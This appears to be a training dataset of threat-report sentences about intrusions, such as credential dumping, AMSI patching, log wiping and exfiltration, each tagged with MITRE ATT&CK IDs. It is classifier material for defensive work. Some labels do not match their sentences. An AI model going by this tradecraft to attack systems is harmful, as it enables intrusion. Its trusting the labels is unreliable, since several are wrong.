{"text1":"Last March, we reported a WildPressure campaign targeting industrial-related entities in the Middle East. While tracking this threat actor in spring 2021, we discovered a newer version. It contains the C++ Milum Trojan, a corresponding VBScript variant and a set of modules that include an orchestrator and three plugins. This confirms our previous assumption that there were more last-stagers besides the C++ ones.","labels":"['T1587.001']"}
|
|
{"text1":"Reaver encrypts this data using an incremental XOR key and uploads it to the configured remote server on the port specified. The following example Python code shows how this encryption takes place:","labels":"['T1573']"}
|
|
{"text1":"If any of the above files or directories exist, the Windows executable throws an exception and exits. This indicates Redaman checks if it is running in a sandbox or similar type of analysis environment.","labels":"['T1497']"}
|
|
{"text1":"After opening the doc file (which is again a Web Archive File), the exploit drops and executes the Trojan program \u201csvcmondr.exe\u201d (8052234dcd41a7d619acb0ec9636be0b).","labels":"['T1203']"}
|
|
{"text1":"And finally, a mention of Trojan-Downloader.Win32.CWS.j, another common site on malicious websites. This downloader is basically a small stub which downloads and installs variants of CWS, perhaps better known as CoolWebSearch. CoolWebSearch is a malicious program which was first reported circa 2003. Ever since, a huge number of variants have been found in the wild, most of them following the same pattern of hijacking the browser startup page and displaying pornographic pop-ups. Over time, CWS variants have become more and more complex and the latest versions include rootkit stealth components and retro features designed to terminate antivirus programs.","labels":"['T1176', 'T1014', 'T1588.001']"}
|
|
{"text1":"The Russian-speaking APT group Turla (known variously as \u2018Snake\u2019, \u2018Uroburos\u2019, \u2018Venomous Bear\u2019 and \u2018KRYPTON\u2019) has been active since at least 2007 (and maybe even longer). Its activities have been traced to many high-profile incidents, including the 2008 attack against the US Central Command (the Buckshot Yankee incident) and, more recently, the attack against the Swiss military contractor, RUAG. We\u2019ve discuss its activities on a number of occasions (here, here, here and here). The group intensified its activities in 2014, targeting Ukraine, EU-related institutions, governments of EU countries, global foreign affairs ministries, media companies and possibly corruption-related targets in Russia. In 2015 and 2016 the group diversified its activities, switching from the Epic Turla watering-hole framework to the Gloog Turla framework, which is still active. The group also expanded its spear-phishing activities with the Skipper\/WhiteAtlas attacks, which made use of new malware. Recently, the group has intensified its satellite-based C2 registrations ten-fold compared to the 2015 average.","labels":"['T1587.001']"}
|
|
{"text1":"BONDUPDATER waits to receive an instruction from the C2 server that starts with \u201cE\u201d before writing the downloaded data to the supplied filename. After receiving the \u201cE\u201d instruction, the Trojan will write the base64 decoded data to the file and process the newly created file. Figure 27 shows the C2 server providing the \u201cE\u201d instruction within the TXT answer. In the current example, the Trojan would treat the newly saved file as a script thanks to the filename ending with the \u201c0\u201d character. The Trojan would run the contents of the file using \u201ccmd.exe\u201d and save the output to a file named \u201cproc10100\u201d that will be uploaded to the C2 server.","labels":"['T1059.003']"}
|
|
{"text1":"Based on posts on an underground forum, we believe that the developer of Chthonic supplies binaries to other cyber-criminals and rents out the C2 infrastructure. Therefore, this distribution of victims likely represents several otherwise unconnected cyber-crime operations.","labels":"['T1588.001', 'T1583']"}
|
|
{"text1":"When the news broke in 2014 about a new sophisticated threat actor dubbed the Turla Group, which the Estonian foreign intelligence service believes has Russian origins and operates on behalf of the FSB, its kernelmode malware also became the first publicly-described case that abused a third-party device driver to disable Driver Signature Enforcement (DSE). This security mechanism was introduced in Windows Vista to prevent unsigned drivers from loading into kernel space. Turla exploited the signed VirtualBox driver, VBoxDrv.sys v1.6.2, to deactivate DSE and load its unsigned payload drivers afterward.","labels":"['T1211']"}
|
|
{"text1":"Since December 2017 security researchers have been seeing samples of MS Office documents in spearphishing emails related to the Winter Olympics uploaded to VirusTotal. The documents contained nothing but slightly formatted gibberish to make it look like the text had an encoding problem, encouraging the user to press a button to \u201cEnable Content\u201d.","labels":"['T1566.001']"}
|
|
{"text1":"Interestingly, the ChChes samples we observed were digitally signed using a certificate originally used by HackingTeam and later part of the data leaked when they were themselves hacked. Wapack labs also observed a similar sample targeting Japan in November. It\u2019s not clear why the attackers chose to use this certificate, as it was old, had been leaked online, and had already been revoked by the time they used it. Digital certificates are typically used because they afford an air of legitimacy, which this one definitely does not.","labels":"['T1596.003']"}
|
|
{"text1":"The authors of Black Lambert included a couple of very interesting details in the sample, which read as the following: toolType=wl, build=132914, versionName = 2.0.0. Looking for similar samples, we were able to identify another generation of related tools which we called White Lambert. While Black Lambert connects directly to its C&C for instructions, White Lambert is a fully passive, network-driven backdoor.","labels":"['T1587.001']"}
|
|
{"text1":"In Figure 4, the first DNS query to resolve is yFIOr645245444143544544.windows64x[.]com which acts as an initial beacon. The first five characters (yFIOr) are random and have no purpose other than generating random subdomains in order to avoid DNS caching. The next two characters (64) signify the Hex notation of the d request type, which is the request type for the initial beacon as noted in Table 3. The request type is followed by the system specific hostname hardcoded into the sample, which in this case is 5245444143544544 for <REDACTED>.","labels":"['T1583.002']"}
|
|
{"text1":"As soon as the proof-of-concept (PoC) for CVE-2020-9054 was made publicly available last month, this vulnerability was promptly abused to infect vulnerable versions of Zyxel network-attached storage (NAS) devices with a new Mirai variant \u2013 Mukashi.","labels":"['T1588.006']"}
|
|
{"text1":"This is exceedingly noisy traffic. Furthermore, Hancitor has demonstrated a noticeable lack of stealth in deploying and using this ping tool. Such an unusual EXE file is easy to notice, especially when the results of its scan are saved as a text file in the same directory.","labels":"['T1588.002', 'T1588.002']"}
|
|
{"text1":"In our previous article, we mentioned since this GPON Vulnerability (CVE-2018-10561, CVE-2018-10562) announced, there have been at least five botnets family mettle, muhstik, mirai, hajime, satori actively exploit the vulnerability to build their zombie army in just 10 days.","labels":"['T1584.005', 'T1588.006', 'T1203']"}
|
|
{"text1":"Palo Alto Networks WildFire observed commands provided by the C2 server for the known Helminth samples. The commands, as seen below, show that the threat actors are attempting to do initial information gathering on the system, including available user accounts, username, computer name, running tasks, services, network services and if remote desktop is enabled.","labels":"['T1033', 'T1049', 'T1590', 'T1082']"}
|
|
{"text1":"The Wekby group continues to target various high profile organizations using sophisticated malware. The pisloader malware family uses various novel techniques, such as using DNS as a C2 protocol, as well as making use of return-oriented programming and other anti-analysis tactics.","labels":"['T1583.002']"}
|
|
{"text1":"While analyzing this intrusion, we observed further persistence via scheduled tasks associated with post-exploitation activities. This scheduled task with name HpSupport executed a Cobalt Strike Beacon kaslose64.dll both on the Domain Controller and the File Server:","labels":"['T1053.005', 'T1053']"}
|
|
{"text1":"Without the encrypted AES key appended to the encrypted files, even if the private key used for encryption was recovered, the files could not be decrypted. Therefore, the Hermes executable used in the FEIB SWIFT attack appears never to have been used to ransom the machine, but rather to destroy the victim\u2019s data. ","labels":"['T1486']"}
|
|
{"text1":"In total Unit 42 has seen over 50 versions of these weaponized documents spanning from late October through to March. We\u2019ve used these to lay out a timeline, which will be referenced throughout the remainder of this blog, of the milestones of evolution that provides some insight into why the changes are made. Note: This figure does not cover all versions seen but simply milestone changes. It does however start with the first version created on October 23rd, last saved 25th October and first seen by our Wildfire cloud sandbox 26th October.","labels":"['T1587.001']"}
|
|
{"text1":"Throughout the intrusion, the injected Cobalt Strike Processes utilized various named pipes for inter-process communications. Many of these pipes used default Cobalt Strike pipe patterns.","labels":"['T1055']"}
|
|
{"text1":"This update to Emissary allowed the Trojan to run as a service. The configuration now contains settings for the Emissary service, which the Trojan will store in and access from the following registry keys:","labels":"['T1574.011']"}
|
|
{"text1":"The bot will report key information back to the C&C, including the result of the various custom API executions. The first communications include any hard-coded C&C followed by the DGA. Shifu uses RC4 encryption in the network communications. Notably, the key for the samples analyzed by iSIGHT Partners is actually the default RC4 key included with the Crypto library, further suggesting this malware is under development. The following is the key observed:","labels":"['T1587.001']"}
|
|
{"text1":"Figure 32 shows QUADAGENT issuing DNS requests with incrementing sequence numbers and the C2 providing the session identifier and pre-shared key within the IPv6 answers. The screenshot also shows the Trojan sending a DNS query to notify the C2 that it successfully received the data.","labels":"['T1583.002']"}
|
|
{"text1":"For this method, Ransom Cartel uses a tool named \"\"DonPAPI,\"\" which can search hosts for DPAPI blobs containing Wi-Fi keys, RDP passwords, and credentials saved in web browsers and then download and decrypt them locally on the machine.","labels":"['T1587.001']"}
|
|
{"text1":"It also can make and send screenshots to the C&C, as well as any file that matches a specified mask.","labels":"['T1113']"}
|
|
{"text1":"Using spear-phishing emails that contained malicious Amazon-themed documents, the group targeted an employee of an aerospace company in the Netherlands and a political journalist in Belgium.","labels":"['T1566.003']"}
|
|
{"text1":"It reads and executes commands from a text file stored in Mega cloud storage","labels":"['T1530']"}
|
|
{"text1":"BlackLotus claims to come with anti-virtual machine (anti-VM), anti-debug, and code obfuscation features to block malware analysis attempts. The seller also claims that security software cannot detect and kill the bootkit as it runs under the SYSTEM account within a legitimate process.","labels":"['T1497']"}
|
|
{"text1":"These credentials are then used to compromise Linux ESXi servers and authenticate to their vCenter web interfaces.","labels":"['T1199']"}
|
|
{"text1":"CreepyUp: uploads any file to the C&C server.","labels":"['T1105']"}
|
|
{"text1":"The browser extension serves as adware and an infostealer, leaking all of the user\u2019s search engine queries. We discovered significant changes and additions of capabilities throughout this campaign's evolution, and we predict further changes as this campaign continues.","labels":"['T1217']"}
|
|
{"text1":"Creates new users\u2019 accounts","labels":"['T1136.001']"}
|
|
{"text1":"The campaign commences via a SPAM email containing a malicious new URL being sent to potential victims. The URL landing page presents the recipient with a password for a ZIP file.","labels":"['T1566.002']"}
|
|
{"text1":"UEFI bootkits are planted in the system firmware and are invisible to security software running within the operating system because the malware loads in the initial stage of the booting sequence.","labels":"['T1542.001']"}
|
|
{"text1":"During the defense evasion phase, anti-malware and monitoring software is often disabled. Firewall rules have occasionally been seen being disabled as well.","labels":"['T1489', 'T1489']"}
|
|
{"text1":"With the upsurgence of ProxyShell, webshells have become more common entry points.","labels":"['T1505.003', 'T1505.003']"}
|
|
{"text1":"Adds newly created accounts to the administrators group to maintain elevated access.","labels":"['T1098']"}
|
|
{"text1":"Most of the fake lures for this campaign are related to games, subtitle files, adult videos, and cracked MS Office applications. These are hosted in ZIP format on legitimate file hosting services.","labels":"['T1189']"}
|
|
{"text1":"The implanted VBS file is capable of reporting information about infected machines and downloading additional payloads with an encoded format","labels":"['T1059.005']"}
|
|
{"text1":"In one case the attackers used one module for taking screenshots and another for uploading them to the C&C server","labels":"['T1113']"}
|
|
{"text1":"Identity theft via hijacking user-profiles and stealing their cryptocurrency, or using popular accounts to spread malware and\/or scams","labels":"['T1083']"}
|
|
{"text1":"During the extraction, a JSP webshell is deployed on one of the public directories used by the webmail component. The attacker can browse to the webshell to start executing arbitrary commands on the victim machine.","labels":"['T1059']"}
|
|
{"text1":"Obscure secure messaging client as delivery vehicle for malware and cloak for malicious activity","labels":"['T1573']"}
|
|
{"text1":"Compromises users\u2019 saved passwords from browsers.","labels":"['T1555.003']"}
|
|
{"text1":"Process Explorer, Process Monitor and PCHunter have been utilized to discover any anti-malware or monitoring software and terminate it.","labels":"['T1057', 'T1057']"}
|
|
{"text1":"The ZIP file contains a single .ISO file. The use of an ISO file is an attempt to defeat the \u201cMark of the Web (MOTW),\u201d which tags files as being downloaded from the internet. It subjects these files to additional security measures by Windows and endpoint security solutions.","labels":"['T1553.005']"}
|
|
{"text1":"AnyDesk has been the most common legitimate desktop software used to establish an interactive command and control channel, with ConnectWise seen slightly less frequently.","labels":"['T1219', 'T1219']"}
|
|
{"text1":"By using DoH, attackers can hide DNS queries from C&C domains. If SSL\/TLS traffic is not being inspected using man-in-the-middle (MitM) techniques, DNS queries to the C&C server will therefore go unnoticed. ","labels":"['T1572']"}
|
|
{"text1":"Uses encoded PowerShell commands.","labels":"['T1027']"}
|
|
{"text1":"Mailman: communicates with a C&C server to receive commands and writes them to a file. It also sends the file with output from commands to the C&C server.","labels":"['T1071']"}
|
|
{"text1":"Affiliates have been seen brute forcing exposed RDP services and compromising accounts with weak passwords.","labels":"['T1078.003', 'T1133']"}
|
|
{"text1":"Uses Rclone to exfiltrate data to cloud sharing websites (such as PCloud and MegaSync).","labels":"['T1567.002']"}
|
|
{"text1":"Clears Windows PowerShell and WitnessClientAdmin log file.","labels":"['T1070.003']"}
|
|
{"text1":"Those campaigns relied on social engineering attacks through LinkedIn, pushing .NET Core malware masquerading as a PDF document supposedly containing details about a marketing project.","labels":"['T1566.003']"}
|
|
{"text1":"Victims receive spear phishing emails with attached malicious zip files - typically password protected or HTML file. That file contains an ISO file.","labels":"['T1566.001']"}
|
|
{"text1":"Finally, the threat actors shut down VMs, terminate all related processes, and encrypt Vmware-related files (.log, .vmdk, .vmem, .vswp and .vmsn).","labels":"['T1486']"}
|
|
{"text1":"Uses wevtutil to clear the Windows event logs.","labels":"['T1070.001']"}
|
|
{"text1":"Deletes rules in the Windows Defender Firewall exception list related to AnyDesk ","labels":"['T1562.004']"}
|
|
{"text1":"Dumps password hashes for use in pass the hash authentication attacks.","labels":"['T1550.002']"}
|
|
{"text1":"For C&C communication, POLONIUM abuses common cloud services such as Dropbox, OneDrive, and Mega.","labels":"['T1136.003']"}
|
|
{"text1":"The only known method of delivering stolen information to cybercriminals is by sending a ZIP archive to an embedded control center.","labels":"['T1102']"}
|
|
{"text1":"The ransomware payload is copied to an Active Directory Domain Controller and deployed to systems using the Default Domain Group Policy Object","labels":"['T1570']"}
|
|
{"text1":"TechnoCreep is a previously undocumented C# backdoor that communicates with a C&C server via TCP sockets. In this case, commands are not read from a file, but received in an exchange of messages","labels":"['T1071']"}
|
|
{"text1":"It is able to steal autofill information from web browsers, cookies, saved credit cards, browser history, coin wallets and Telegram databases. ","labels":"['T1185']"}
|
|
{"text1":"Credentials that have either been reused across multiple platforms or have previously been exposed. Additionally, this includes VPN accounts - not just domain and local accounts.","labels":"['T1078']"}
|
|
{"text1":"LockBit 2.0 is typically executed via command line arguments via a hidden window. Windows SysInternals PsExec has been utilized for both persistence and execution purposes. Its ability to execute processes on other systems spread the ransomware and assisted in reconnaissance activities.","labels":"['T1059']"}
|
|
{"text1":"It was quite common to see scheduled tasks used to create persistence for the ransomware executable, PsExec, and occasionally some defense evasion batch scripts.","labels":"['T1053.005']"}
|
|
{"text1":"In rare cases, LockBit 2.0 has been observed to create accounts for persistence with simple names, such as `a.`","labels":"['T1136.001']"}
|
|
{"text1":"LockBit 2.0 enumerates system information such as hostname, shares, and domain information.","labels":"['T1082']"}
|
|
{"text1":"MEGASync is the leading way for LockBit 2.0 affiliates to exfiltrate data from clients with it being occasionally replaced by RClone.","labels":"['T1041']"}
|
|
{"text1":"LockBit 2.0 is known for its extortion tactics, encrypting devices and demanding a ransom.","labels":"['T1486']"}
|
|
{"text1":"The NewsBeef APT previously engaged in long-term, elaborate social engineering schemes that take advantage of popular social network platforms. Previous analysis of the NewsBeef APT indicates that the group focuses on Saudi Arabian (SA) and Western targets, and lacks advanced offensive technology development capabilities.","labels":"['T1593.001']"}
|
|
{"text1":"Kimsuky has searched for vulnerabilities, tools, and geopolitical trends on Google search engine to target victims","labels":"['T1593.002']"}
|
|
{"text1":"Russian state-sponsored APT actors have performed \u201cKerberoasting,\u201d whereby they obtained the Ticket Granting Service (TGS) Tickets for Active Directory Service Principal Names (SPN) for offline cracking.","labels":"['T1090.003', 'T1558.003']"}
|
|
{"text1":"identify configuration settings, exfiltrate data, and to execute other commands.","labels":"['T1059.003']"}
|
|
{"text1":"Russian state-sponsored APT actors have used credentials of existing accounts to maintain persistent, long-term access to compromised networks.","labels":"['T1078']"}
|
|
{"text1":"Russian state-sponsored APT actors have exfiltrated credentials and exported copies of the Active Directory database ntds.dit.","labels":"['T1003.003']"}
|
|
{"text1":"Russian state-sponsored APT actors have used previously compromised account credentials to attempt to access Group Managed Service Account (gMSA) passwords.","labels":"['T1555']"}
|
|
{"text1":"BlackMatter may wipe backup systems.","labels":"['T1561']"}
|
|
{"text1":"BlackMatter remotely encrypts shares via SMB protocol and drops a ransomware note in each directory.","labels":"['T1486']"}
|
|
{"text1":"BlackMatter uses srvsvc.NetShareEnumAll MSRPC function to enumerate and SMB to connect to all discovered shares, including ADMIN$, C$, SYSVOL, and NETLOGON.","labels":"['T1021.002']"}
|
|
{"text1":"BlackMatter uses EnumServicesStatusExW to enumerate running services on the network.","labels":"['T1007']"}
|
|
{"text1":"BlackMatter uses NtQuerySystemInformation to enumerate running processes","labels":"['T1057']"}
|
|
{"text1":"BlackMatter leverages LDAP and SMB protocol to discover all hosts in the AD.","labels":"['T1018']"}
|
|
{"text1":"BlackMatter leverages legitimate remote monitoring and management software and remote desktop software, often by setting up trial accounts, to maintain persistence on victim networks.","labels":"['T1133']"}
|
|
{"text1":"Chinese state-sponsored cyber actors have been assessed to perform reconnaissance on Microsoft\u00ae 365 (M365), formerly Office\u00ae 365, resources with the intent of further gaining information about the networks. These scans can be automated, through Python\u00ae scripts, to locate certain files, paths, or vulnerabilities. The cyber actors can gain valuable information on the victim network, such as the allocated resources, an organization\u2019s fully qualified domain name, IP address space, and open ports to target or exploit.","labels":"['T1595', 'T1590']"}
|
|
{"text1":"Chinese state-sponsored cyber actors have been observed using VPSs from cloud service providers that are physically distributed around the world to host malware and function as C2 nodes.","labels":"['T1583', 'T1583']"}
|
|
{"text1":"Chinese state-sponsored cyber actors have exploited known vulnerabilities in Internet-facing systems. [1] For information on vulnerabilities known to be exploited by Chinese state-sponsored cyber actors, refer to the Trends in Chinese State-Sponsored Cyber Operations section for a list of resources. Chinese state-sponsored cyber actors have also been observed: \u2022 Using short-term VPS devices to scan and exploit vulnerable Microsoft Exchange\u00ae Outlook Web Access (OWA\u00ae) and plant webshells. \u2022 Targeting on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments to gain access to cloud resources. \u2022 Deploying a public proof of concept (POC) exploit targeting a public-facing appliance vulnerability.","labels":"['T1190']"}
|
|
{"text1":"Chinese state-sponsored cyber actors have been observed conducting spearphishing campaigns. These email compromise attempts range from generic emails with mass targeted phishing attempts to specifically crafted emails in targeted social engineering lures. These compromise attempts use the cyber actors\u2019 dynamic collection of VPSs, previously compromised accounts, or other infrastructure in order to encourage engagement from the target audience through domain typo-squatting and masquerading. These emails may contain a malicious link or files that will provide the cyber actor access to the victim\u2019s device after the user clicks on the malicious link or opens the attachment.","labels":"['T1566.001', 'T1566.002']"}
|
|
{"text1":"Chinese state-sponsored cyber actors have been observed: gaining credential access into victim networks by using legitimate, but compromised credentials to access OWA servers, corporate login portals, and victim networks.","labels":"['T1078.001', 'T1078.002']"}
|
|
{"text1":"Chinese state-sponsored cyber actors have been observed using Cobalt Strike, webshells, or command line interface tools, such as schtask or crontab to create and schedule tasks that enumerate victim devices and networks.","labels":"['T1053.003', 'T1053.005']"}
|
|
{"text1":"Chinese state-sponsored cyber actors have been observed conducting spearphishing campaigns that encourage engagement from the target audience. These emails may contain a malicious link or file that provide the cyber actor access to the victim\u2019s device after the user clicks on the malicious link or opens the attachment.","labels":"['T1204.001', 'T1204.002']"}
|
|
{"text1":"Chinese state-sponsored cyber actors have been observed using benign executables which used Dynamic Link Library (DLL) load-order hijacking to activate the malware installation process.","labels":"['T1574.001']"}
|
|
{"text1":"Chinese state-sponsored cyber actors were observed creating a new sign-in policy to bypass MFA requirements to maintain access to the victim network.","labels":"['T1556.001']"}
|
|
{"text1":"Chinese state-sponsored cyber actors have been observed planting web shells on exploited servers and using them to provide the cyber actors with access to the victim networks.","labels":"['T1505.003']"}
|
|
{"text1":"Chinese state-sponsored cyber actors have been observed executing malware shellcode and batch files to establish new services to enable persistence","labels":"['T1543.003']"}
|
|
{"text1":"Chinese state-sponsored cyber actors have been observed: \u2022 Injecting into the rundll32.exe process to hide usage of Mimikatz, as well as injecting into a running legitimate explorer.exe process for lateral movement. \u2022 Using shellcode that injects implants into newly created instances of the Service Host process (svchost).","labels":"['T1055.001', 'T1055.002']"}
|
|
{"text1":"Chinese state-sponsored cyber actors were observed using the 7-Zip utility to unzip imported tools and malware files onto the victim device.","labels":"['T1140']"}
|
|
{"text1":"Chinese state-sponsored cyber actors were observed using benign executables which used DLL load-order hijacking to activate the malware installation process.","labels":"['T1564']"}
|
|
{"text1":"Chinese state-sponsored cyber actors were observed Base64 encoding files and command strings to evade security measures.","labels":"['T1218.005', 'T1218.011']"}
|
|
{"text1":"Chinese state-sponsored cyber actors have been observed exploiting Pulse Secure VPN appliances to view and extract valid user credentials and network information from the servers.","labels":"['T1212']"}
|
|
{"text1":"Chinese state-sponsored cyber actors were observed targeting the LSASS process or Active directory (NDST.DIT) for credential dumping.","labels":"['T1003.001', 'T1003.003']"}
|
|
{"text1":"Chinese state-sponsored cyber actors have been observed using multiple implants with file system enumeration and traversal capabilities.","labels":"['T1083']"}
|
|
{"text1":"Chinese state-sponsored cyber actors have been observed using commands, including net group and net localgroup, to enumerate the different user groups on the target network.","labels":"['T1069']"}
|
|
{"text1":"Chinese state-sponsored cyber actors have been observed using Nbtscan and nmap to scan and enumerate target network information.","labels":"['T1046']"}
|
|
{"text1":"Chinese state-sponsored cyber actors have been observed using Base-64 encoded commands, including ping, net group, and net user to enumerate target network information.","labels":"['T1018']"}
|
|
{"text1":"Chinese state-sponsored cyber actors used valid accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, RDP, and Virtual Network Computing (VNC). The actor may then perform actions as the logged-on user. Chinese state-sponsored cyber actors also used on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments in order to pivot to cloud resources.","labels":"['T1210']"}
|
|
{"text1":"Chinese state-sponsored cyber actors compressed and encrypted exfiltration files into RAR archives, and subsequently utilized cloud storage services for storage.","labels":"['T1560']"}
|
|
{"text1":"Chinese state-sponsored cyber actors have been observed using the mv command to export files into a location, like a compromised Microsoft Exchange, IIS, or emplaced webshell prior to compressing and exfiltrating the data from the target network.","labels":"['T1074']"}
|
|
{"text1":"Chinese state-sponsored cyber actors have been observed using the New-MailboxExportRequest PowerShell cmdlet to export target email boxes.","labels":"['T1114']"}
|
|
{"text1":"Chinese state-sponsored cyber actors have been observed: \u2022 Using commercial cloud storage services for command and control. \u2022 Using malware implants that use the Dropbox API for C2 and a downloader that downloads and executes a payload using the Microsoft OneDrive API.","labels":"['T1071']"}
|
|
{"text1":"Chinese state-sponsored cyber actors have been observed using a non-standard SSH port to establish covert communication channels with VPS infrastructure.","labels":"['T1571']"}
|
|
{"text1":"Chinese state-sponsored cyber actors have been observed using a network of VPSs and small office and home office (SOHO) routers as part of their operational infrastructure to evade detection and host C2 activity. Some of these nodes operate as part of an encrypted proxy service to prevent attribution by concealing their country of origin and TTPs.","labels":"['T1090.003']"}
|
|
{"text1":"The actors used a variety of public exploits, including CVE-2020-0688 and CVE-2020-17144, to gain privileged remote code execution on vulnerable Microsoft Exchange servers. In some cases, this exploitation occurred after valid credentials were identified by password spray, as these vulnerabilities require authentication as a valid user.","labels":"['T1190']"}
|
|
{"text1":"The actors used a compromised Office 365 service account with Global Administrator privileges to collect email from user inboxes.","labels":"['T1078.002']"}
|
|
{"text1":"The actors used a modified and obfuscated version of the reGeorg web shell to maintain persistent access on a target's Outlook Web Access (OWA\u00ae) server.","labels":"['T1505.003']"}
|
|
{"text1":"The actors operate a Kubernetes cluster, which allows them to conduct distributed and large-scale targeting using password spray and password guessing","labels":"['T1110.003']"}
|
|
{"text1":"The actors dumped LSASS process memory by using 'rundll32.exe' to execute the MiniDump function exported by the native Windows\u00ae DLL 'comsvcs.dll'.","labels":"['T1003.001']"}
|
|
{"text1":"The actors mapped network drives using 'net use' and administrator credentials.","labels":"['T1021.002']"}
|
|
{"text1":"The actors collected email from Office 365 using a compromised valid service account with elevated privileges.","labels":"['T1114.002']"}
|
|
{"text1":"The actors named one instance of their web shell 'outlookconfiguration.aspx' likely for the purpose of appearing to be a legitimate webpage on a targeted OWA server.","labels":"['T1036.005']"}
|
|
{"text1":"The actors downloaded archives of collected data previously staged on a target's OWA server via HTTPS.","labels":"['T1048.002']"}
|
|
{"text1":"The actors split some archived exfiltration files into chunks smaller than 1MB.","labels":"['T1030']"}
|
|
{"text1":"SVR targets organisations that supply privileged software to intelligence targets.","labels":"['T1195.002']"}
|
|
{"text1":"SVR leveraged access gained from the SolarWinds campaign to compromise a certificate issued by Mimecast, which it then used to authenticate a subset of Mimecast's products with customer systems.","labels":"['T1199']"}
|
|
{"text1":"The Iranian government-sponsored APT actors gained initial access by exploiting vulnerabilities affecting Microsoft Exchange servers (CVE-2021-34473) and Fortinet devices (CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591)","labels":"['T1190']"}
|
|
{"text1":"The Iranian government-sponsored APT actors may have established new user accounts on domain controllers, servers, workstations, and active directories. Some of these accounts appear to have been created to look similar to other existing accounts on the network, so specific account names may vary per organization. In addition to unrecognized user accounts or accounts established to masquerade as existing accounts, the following account usernames may be associated with this activity: Support, Help, elie, WADGUtilityAccount","labels":"['T1136.001', 'T1136.002']"}
|
|
{"text1":"The APT actors forced BitLocker activation on host networks to encrypt data [T1486]. The corresponding threatening notes were either sent to the victim or left on the victim network as a .txt file. The ransom notes included ransom demands and the following contact information. sar_addr@protonmail[.]com WeAreHere@secmail[.]pro nosterrmann@mail[.]com nosterrmann@protonmail[.]com","labels":"['T1486']"}
|
|
{"text1":"The actors used two Impacket tools: wmiexec.py and smbexec.py.","labels":"['T1059.006']"}
|
|
{"text1":"Actors executed malicious payloads via loading shared modules. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths.","labels":"['T1129']"}
|
|
{"text1":"Actors used the del.exe command with the \/f parameter to force the deletion of read-only files with the *.rar and tempg* wildcards.","labels":"['T1070.004']"}
|
|
{"text1":"Actors used Windows command shell commands to detect and avoid virtualization and analysis environments.","labels":"['T1497.001', 'T1497.001']"}
|
|
{"text1":"The execution of the malicious PuTTY binary resulted in the deployment of a backdoor to the host. The deployed backdoor is an evolution of the malware family Mandiant tracks as AIRDRY.","labels":"['T1218']"}
|
|
{"text1":"In the PuTTY sample discovered on VirusTotal, the malicious code was inserted into the ssh2_userauth_process_queue function (source file: putty-0.77\\ssh\\userauth2-client.c). The code resides in the part of the function responsible for performing password authentication, as opposed to other methods such as public key or keyboard-interactive authentication. Once the user establishes a connection and enters their username and password, the malicious code is executed regardless of the authentication result.","labels":"['T1480']"}
|
|
{"text1":"In the PuTTY sample discovered on VirusTotal, the malicious code was inserted into the ssh2_userauth_process_queue function (source file: putty-0.77\\ssh\\userauth2-client.c). The code resides in the part of the function responsible for performing password authentication, as opposed to other methods such as keyboard-interactive authentication or public key. Once the user establishes a connection and enters their username and password, the malicious code is executed regardless of the authentication result.","labels":"['T1480']"}
|
|
{"text1":"The size of the PuTTY binary downloaded by the victim is also substantially larger than the legitimate version. Upon closer inspection, it has a large, high entropy .data section in comparison to the officially distributed version (Figure 3). Sections like these are typically indicative of packed or encrypted data.","labels":"['T1027.002']"}
|
|
{"text1":"The additional layer is position-independent shellcode containing a reflective DLL loader. The loader decrypts an RC4-encrypted payload and loads it in memory. The code itself is a straightforward loader with the exception of some interesting artifacts identified during analysis.","labels":"['T1620']"}
|
|
{"text1":"Commands passed as arguments into e.py were also seen being executed by the targeted Windows guest machine, running as a child process under vmtoolsd.exe. This execution chain can be seen in Figure 5. The parent binary \/bin\/rdt was not present on disk but was able to be recovered by dumping the process memory of the ESXi hypervisor. The Python script that sent out commands to the guest machines, e.py, was unable to be recovered.","labels":"['T1202']"}
|
|
{"text1":"Deleted File created by vmtoolsd.exe and executed by vmtoolsd.exe child process.","labels":"['T1070.004']"}
|
|
{"text1":"The payload was an AutoIT downloader that retrieved and executed additional PowerShell from hxxps:\/\/85.206.161[.]216:8080\/HomePage.htm. The follow-on PowerShell profiled the target system\u2019s architecture, downloaded the appropriate variant of PowerSploit (MD5: c326f156657d1c41a9c387415bf779d4 or 0564706ec38d15e981f71eaf474d0ab8), and reflectively loaded PUPYRAT (MD5: 94cd86a0a4d747472c2b3f1bc3279d77 or 17587668AC577FCE0B278420B8EB72AC).","labels":"['T1620']"}
|
|
{"text1":"Efforts to decrease operational visibility included placing tool and output files within temporary file system mount points that were stored in volatile memory. Additionally, UNC1945 used built-in utilities and public tools to modify timestamps and selectively manipulate Unix log files.","labels":"['T1070.006']"}
|
|
{"text1":"UNC1945 employed anti-forensics techniques with the use of a custom ELF utility named LOGBLEACH. The actor used built-in Linux commands to alter the timestamps of files and directories and used LOGBLEACH to clean logs to thwart forensic analysis, as seen in Figure 4.","labels":"['T1070.006']"}
|
|
{"text1":"BOATLAUNCH is a utility sent from FIN7 POWERPLANT controllers that is used as a helper module during intrusion operations. BOATLAUNCH is used to patch PowerShell processes on infected systems to bypass the Windows Antimalware Scan Interface (AMSI). The malware loops, looking for unpatched PowerShell processes, and for each unpatched process the malware locates and patches amsi.dll!AmsiScanBuffer with a 5-byte instruction sequence to always return S_OK. The technique used to patch AMSI is a variation of publicly described common AMSI bypass techniques. Both 32-bit and 64-bit variants of BOATLAUNCH have been observed using the following export directory DLL names.","labels":"['T1055']"}
|
|
{"text1":"Actors used the systeminfo command to look for details about the network configurations and settings and determine if the system was a VMware virtual machine. The threat actor used route print to display the entries in the local IP routing table.","labels":"['T1016']"}
|
|
{"text1":"Actors used the netstat command to display TCP connections, prevent hostname determination of foreign IP addresses, and specify the protocol for TCP.","labels":"['T1049']"}
|
|
{"text1":"Actors used the tasklist command to get information about running processes on a system and determine if the system was a VMware virtual machine. The actors used tasklist.exe and find.exe to display a list of applications and services with their PIDs for all tasks running","labels":"['T1057']"}
|
|
{"text1":"Actors used the ipconfig command to get detailed information about the operating system and hardware and determine if the system was a VMware virtual machine","labels":"['T1082']"}
|
|
{"text1":"Actors enumerated files and directories or may search in specific locations of a host or network share for certain information within a file system.","labels":"['T1083']"}
|
|
